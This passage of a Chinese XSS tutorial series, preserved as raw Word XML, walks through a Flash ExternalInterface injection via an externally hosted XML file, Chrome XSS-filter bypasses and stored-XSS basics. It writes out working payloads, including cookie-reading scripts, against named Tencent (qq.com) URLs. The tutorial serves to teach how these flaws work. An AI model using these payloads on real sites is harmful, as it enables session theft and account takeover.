                      <a:hlinkClick r:id="rId1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85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4E16C8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换句话说，这里我们的可以控制call的第2个参数。同教程14中的方法，我们下载下来http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml。先做点修改，然后上传到自己网站上。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将代码里日志那一行的href改掉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4E16C8" w:rsidRPr="009C207F" w:rsidTr="004E16C8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="004E16C8" w:rsidRPr="009C207F" w:rsidRDefault="004E16C8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&lt;menuname="日志"href="\&amp;quot;,alert(1)"/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>传修改</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后的文件，同时记得将crossdomain.xml上传至自己的网站根目录下哦～～（见教程14）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6.接着我们载入我们自己指定的XML文件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imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D77643" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7.接着我们打开Firefox浏览器。有人会问，你怎么突然要用Firefox啊！疯了么！！同志</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>们，我没疯，只是因为FF可以捕获到这里的错误，而chrome捕获不到！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77643" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>我们打开Firefox后，访问上面的地址，点击【日志】按钮！！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC6932" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Ctrl+shift+J打开错误控制台！可以看到以下报错！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1044887" wp14:editId="6C5F1491">
            <wp:extent cx="5715000" cy="1009650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86" name="图片 86" descr="86.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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86.jpg">
                      <a:hlinkClick r:id="rId1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86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8.记性好的朋友，会马上想起上一节里我们说到的。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ExternalInterface.call("函数名","参数</w:t>
      </w:r>
      <w:r w:rsidR="00D77643" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1");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实际上执行的是以下内容，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try{__flash__toXML(函数名("参数1"));}catch(e){"&lt;undefined/&gt;";}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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就是从FF这里捕获错误到这点的！（:)当然也还会有其他方法）。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为什么会出错呢?我们一起来看看。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9.当我们点击【日志】按钮时，会调用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flash.external.ExternalInterface.call("custom_menu_swf",menu_array[_local2].href);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而menu_array[_local2].href等于\",alert(1),进而，我们代入完整的代码，即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try{__flash__toXML(custom_menu_swf("\\",alert(1)"));}catch(e){"&lt;undefined/&gt;";}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转换过程如下图：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6A5015B" wp14:editId="5331AB24">
            <wp:extent cx="5715000" cy="2809875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="85" name="图片 85" descr="87.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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87.jpg">
                      <a:hlinkClick r:id="rId1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87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转换之后，JS代码有点乱，引号到处飞，括号无处寻，因而报错了！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0.那么我们怎么构造正确的利用代码呢？其实有上一节的知识并不难！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try{__flash__toXML(custom_menu_swf("</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>构造点构造点</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>"));}catch(e){"&lt;undefined/&gt;";}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D77643" w:rsidRPr="009C207F" w:rsidRDefault="00D77643" w:rsidP="009C207F">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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首先第一步，要注入自己代码，首先要闭合掉双引号！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try{__flash__toXML(custom_menu_swf("构造点"),alert("构造点</w:t>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>"));}catch(e){"&lt;undefined/&gt;";}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但是从上面转换流程，我们可以看到，"会变成\",即变成了下面的样子，还是突破不出去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try{__flash__toXML(custom_menu_swf("构造点\"),alert(\"构造点"));}catch(e){"&lt;undefined/&gt;";}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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337F6EED" wp14:editId="3ACF54B0">
            <wp:extent cx="5715000" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="84" name="图片 84" descr="89.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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89.jpg">
                      <a:hlinkClick r:id="rId1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88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不过非常庆幸的事情是，这里没有对\进行转义。我们可以通过输入\"来构造。JS的字符串里，\用\\表示。如下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>try{__flash__toXML(custom_menu_swf("构造点\\"))}catch(e){alert(1)}//构造点"));}catch(e){"&lt;undefined/&gt;";}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图片分析如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A15A13" w:rsidRDefault="00CC6932" w:rsidP="00A15A13">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AA7DD8B" wp14:editId="04EAF16B">
            <wp:extent cx="5715000" cy="2219325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="83" name="图片 83" descr="88.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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88.jpg">
                      <a:hlinkClick r:id="rId1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A15A13" w:rsidRDefault="00A15A13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15A13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A15A13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A15A1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A15A13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A15A1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A15A13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A15A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15A13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1.罗嗦了这么多，我们把构造点代码，拿出来，插入到XML文件里。注意以下几点：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最后构造的代码是\\",实际我们的输入是\"，然后由FLASH自己转变为\\"的，因而利用代码里只需要输入\"即可。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由于在XML的节点属性里，双引号写为</w:t>
      </w:r>
      <w:r w:rsidR="00D77643" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;quot;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&lt;menuname="日志"href="构造点\&amp;quot;))}catch(e){alert(1)}//构造点</w:t>
      </w:r>
      <w:r w:rsidR="00D77643" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"/&gt;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2.再次上传文件。打开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imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml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点击日志，看看效果。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5988152" wp14:editId="46A5CF53">
            <wp:extent cx="5715000" cy="3105150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="82" name="图片 82" descr="90.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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90.jpg">
                      <a:hlinkClick r:id="rId1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D77643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图</w:t>
      </w:r>
      <w:r w:rsidR="00A15A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>90</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00246D14" w:rsidRPr="009C207F" w:rsidRDefault="00246D14" w:rsidP="00246D14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CC6932" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十七节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>过滤器绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>通用绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>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CC6932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关于反射型的基本东西，暂时就到这啦，如果后面有什么好的case，再做增补。最近，有些人会问到怎么绕过浏览器的XSS过滤器，所以从这节开始，给出点绕过的例子。当然这些绕过浏览器的方法，不是万能的。不同浏览器，不同场景都会存在差异。满足场景要求时，才可以使用。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IE的一些绕过见乌云上的@gainover，@sogili的例子，我们教程就不再提及了。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此文给出的是一个来自sogili分享的chrome下绕过过滤器的方法，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在腾讯某处</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>XSS上的应用。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一类都算是“结合了一定场景”，绕过了浏览器自身的防御机制，具有一定的通用性，我们称为“通用绕过”（瞎起的名字，别在意）。但是在后续版本的浏览器中，这些技巧可能会被浏览器干掉从而失效。再次强调：通用不是全部都行，意思是所适用的场景实际发生的概率比较高！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CC6932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CC6932" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其实就是个普通的XSS点，uin参数没有对任何字符进行过滤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bangbang.qq.com/php/login?game=roco&amp;uin="&gt;&lt;imgsrc=1onerror=alert(1)&gt;&amp;world=5&amp;roleid=44583443&amp;level=8&amp;role=%2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC6932" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="009C207F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正是由于这个点什么都没过滤，浏览器自身的防御机制也最好发挥作用，瞧瞧，chrome拦截了</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。。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20F8741" wp14:editId="08C4BC3B">
            <wp:extent cx="5715000" cy="2343150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93" name="图片 93" descr="91.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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91.jpg">
                      <a:hlinkClick r:id="rId1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A15A13">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>91</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D77643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2.</w:t>
      </w:r>
      <w:r w:rsidR="00CC6932" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有的新手，不知道有过滤器的，更是会觉得“啊，这是怎么回事，怎么不行啊，明明可以的。。</w:t>
      </w:r>
      <w:r w:rsidR="00D77643" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”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只要看到console里有上面那句，就说明chrome的过滤器大发神威了！！</w:t>
      </w:r>
      <w:r w:rsidR="00D77643" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3.我们也看看源码。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E75E152" wp14:editId="0B520858">
            <wp:extent cx="5715000" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="92" name="图片 92" descr="92.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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92.jpg">
                      <a:hlinkClick r:id="rId1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91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危害部分被和谐了。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那么怎么绕过呢？这里直接说方法。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首先要求缺陷点，允许&lt;,&gt;。其次，要求缺陷点的后方存在&lt;/script&gt;标签。我们看看当前的这个点的代码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...</w:t>
            </w:r>
          </w:p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inputtype="hidden"id="sClientUin"value=""&gt;&lt;imgsrc=1onerror=alert(1)&gt;"&gt;</w:t>
            </w:r>
          </w:p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...</w:t>
            </w:r>
          </w:p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type="text/javascript"src="http://pingjs.qq.com/tcss.ping.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p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...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6.可以看到上面的要求均满足。我们就可以使用以下技巧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src=data:</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,alert</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>(1)&lt;!--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7.代入到我们的利用代码里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bangbang.qq.com/php/login?game=roco&amp;uin="&gt;&lt;scriptsrc=data:,alert(1)&lt;!--&amp;world=5&amp;roleid=44583443&amp;level=8&amp;role=%2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次，我们就成功啦。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6516CDB1" wp14:editId="36DDE235">
            <wp:extent cx="5715000" cy="1628775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="91" name="图片 91" descr="93.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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93.jpg">
                      <a:hlinkClick r:id="rId1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92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46D14" w:rsidRPr="009C207F" w:rsidRDefault="00246D14" w:rsidP="00246D14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CC6932" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十八节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>过滤器绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>猥琐绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>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CC6932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有些时候，通用的绕过技巧并不可行，这个时候我们就得观察缺陷点的周围环境，想想其它办法</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>咯</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。“猥琐绕过”与通用绕过不同的是，它通用性小，往往只是特例。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D77643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CC6932" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>直接看实例点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qzs.qq.com/qzone/v6/custom/custom_module_proxy.html#siDomain=1&amp;g_StyleID=aaaaaaaaaa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2.可以看出，这是一个DOMXSS的点。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93BDC19" wp14:editId="0877AAEA">
            <wp:extent cx="5715000" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="97" name="图片 97" descr="95.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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95.jpg">
                      <a:hlinkClick r:id="rId1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9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3.我们看看源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....</w:t>
            </w:r>
          </w:p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varsiDomain=paras['siDomain'],</w:t>
            </w:r>
          </w:p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g_StyleID=paras['g_StyleID'].replace("v6/","");</w:t>
            </w:r>
          </w:p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 w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>if(siDomain.indexOf(".qq.com")&gt;-1){//防止qzs.qq.com</w:t>
            </w:r>
          </w:p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</w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:tab/>
              <w:t>siDomain=paras['siDomain']="qzonestyle.gtimg.cn";</w:t>
            </w:r>
          </w:p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}</w:t>
            </w:r>
          </w:p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document.write('&lt;linkhref="http://'+siDomain+'/qzone_v6/gb/skin/'+g_StyleID+'.css"rel="stylesheet"/&gt;&lt;linkhref="http://'+siDomain+'/qzone_v6/home_normal.css"rel="stylesheet"/&gt;');</w:t>
            </w:r>
          </w:p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...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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不难看出，siDomain与g_StyleID都是地址栏里获取过来，然后通过document.write输出到页面中。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利用先前教程的知识，我们不难构造出利用代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qzs.qq.com/qzone/v6/custom/custom_module_proxy.html#siDomain=1&amp;g_StyleID="&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;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，IE下成功弹出。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1E481D6" wp14:editId="6655DCBC">
            <wp:extent cx="5715000" cy="2952750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="96" name="图片 96" descr="96.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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96.jpg">
                      <a:hlinkClick r:id="rId1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94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但是到了chrome下，又被拦截了。。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB" w:rsidRPr="009C207F" w:rsidRDefault="00CC6932" w:rsidP="00A15A13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07020B04" wp14:editId="746D4F73">
            <wp:extent cx="5715000" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="95" name="图片 95" descr="97.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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97.jpg">
                      <a:hlinkClick r:id="rId1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95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6.这个时候怎么办呢？因为这里接受地址栏的参数时，是以"="分割，因而我们的代码中是不允许携带等号的。故上一篇的技巧不能拿到这里来使用了！</w:t>
      </w:r>
    </w:p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7.chrome拦截，是有一定的拦截规则的，只有它觉得是恶意代码的才会去拦截。这个时候，就需要我们“观察地形”啦！！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仔细看看这句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g_StyleID=paras['g_StyleID'].replace("v6/","");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8.不难看出，这里会对g_StyleID进行一次替换，将v6/替换为空。那么如果我们的g_StyleID写为下面的情况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v6/ipt&gt;alert(document.cookie)&lt;/script&gt;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经过替换后，就会变成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script&gt;alert(document.cookie)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D77643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但是chrome并不会把&lt;scrv6/ipt&gt;alert(document.cookie)&lt;/script&gt;当作恶意的，是不是就可以绕过了？</w:t>
      </w:r>
    </w:p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试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7643" w:rsidRPr="009C207F" w:rsidTr="00D77643">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00D77643" w:rsidRPr="009C207F" w:rsidRDefault="00D77643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http://qzs.qq.com/qzone/v6/custom/custom_module_proxy.html#siDomain=1&amp;g_StyleID="&gt;&lt;scv6/ript&gt;alert(document.cookie)&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CC6932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果然可以～</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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208DD50F" wp14:editId="7C3351AC">
            <wp:extent cx="5715000" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94" name="图片 94" descr="98.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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98.jpg">
                      <a:hlinkClick r:id="rId1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2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96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620E6" w:rsidRPr="009C207F" w:rsidRDefault="00CC693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样一来，我们这个XSS，就不会被浏览器的XSS过滤器所蹂躏啦！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00246D14" w:rsidRPr="009C207F" w:rsidRDefault="00246D14" w:rsidP="00246D14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3620E6" w:rsidRPr="009C207F" w:rsidRDefault="003620E6" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十九节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>存储型</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>入门</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>什么都没过滤的情况</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:t>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CC4147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3620E6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存储型和反射型相比，只是多了输入存储、输出取出的过程。简单点说：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反射型是：输入--输出；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存储型是：输入--进入数据库*--取出数据库--输出。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这样一来，大家应该注意到以下差别：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反射型是：绝大部分情况下，输入在哪里，输出就在哪里。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存储型是：输入在A处进入数据库，而输出则可能出现在其它任何用到数据的地方。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反射型是：输入大部分位于地址栏或来自DOM的某些属性，也会偶尔有数据在请求中（POST</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>类型）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存储型是：输入大部分来自POST/GET请求，常见于一些保存操作中。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因而我们找存储型的时候，从一个地方输入数据，需要检测很多输出的点，从而可能会在很多点发现存储型XSS。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至于如何根据输出来构建存储型XSS的代码，和反射</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>型没有</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>任何区别，都是看输出的上下文来进行。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从程序员过滤代码的角度来讲，我们给之后的教程走向分个类：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数据需要过滤，但是未过滤。导致XSS。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比如：昵称、个人资料。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业务需求使得数据只能部分过滤，但过滤规则不完善，被绕过后导致XSS。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00582C8C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比如：日志、邮件及其它富文本应用。</w:t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本节先看一个最基本的情况，该过滤，但是什么都没过滤的情况。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003620E6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（数据库：不一定是像mysql那样的数据库，只要是能存储数据的都算。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003620E6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6F7A62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3620E6" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>找存储型的时候，需要有一颗多疑的心，一双善于发现的眼睛。我们来看看实例！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003620E6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2.</w:t>
      </w:r>
      <w:r w:rsidR="003620E6" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
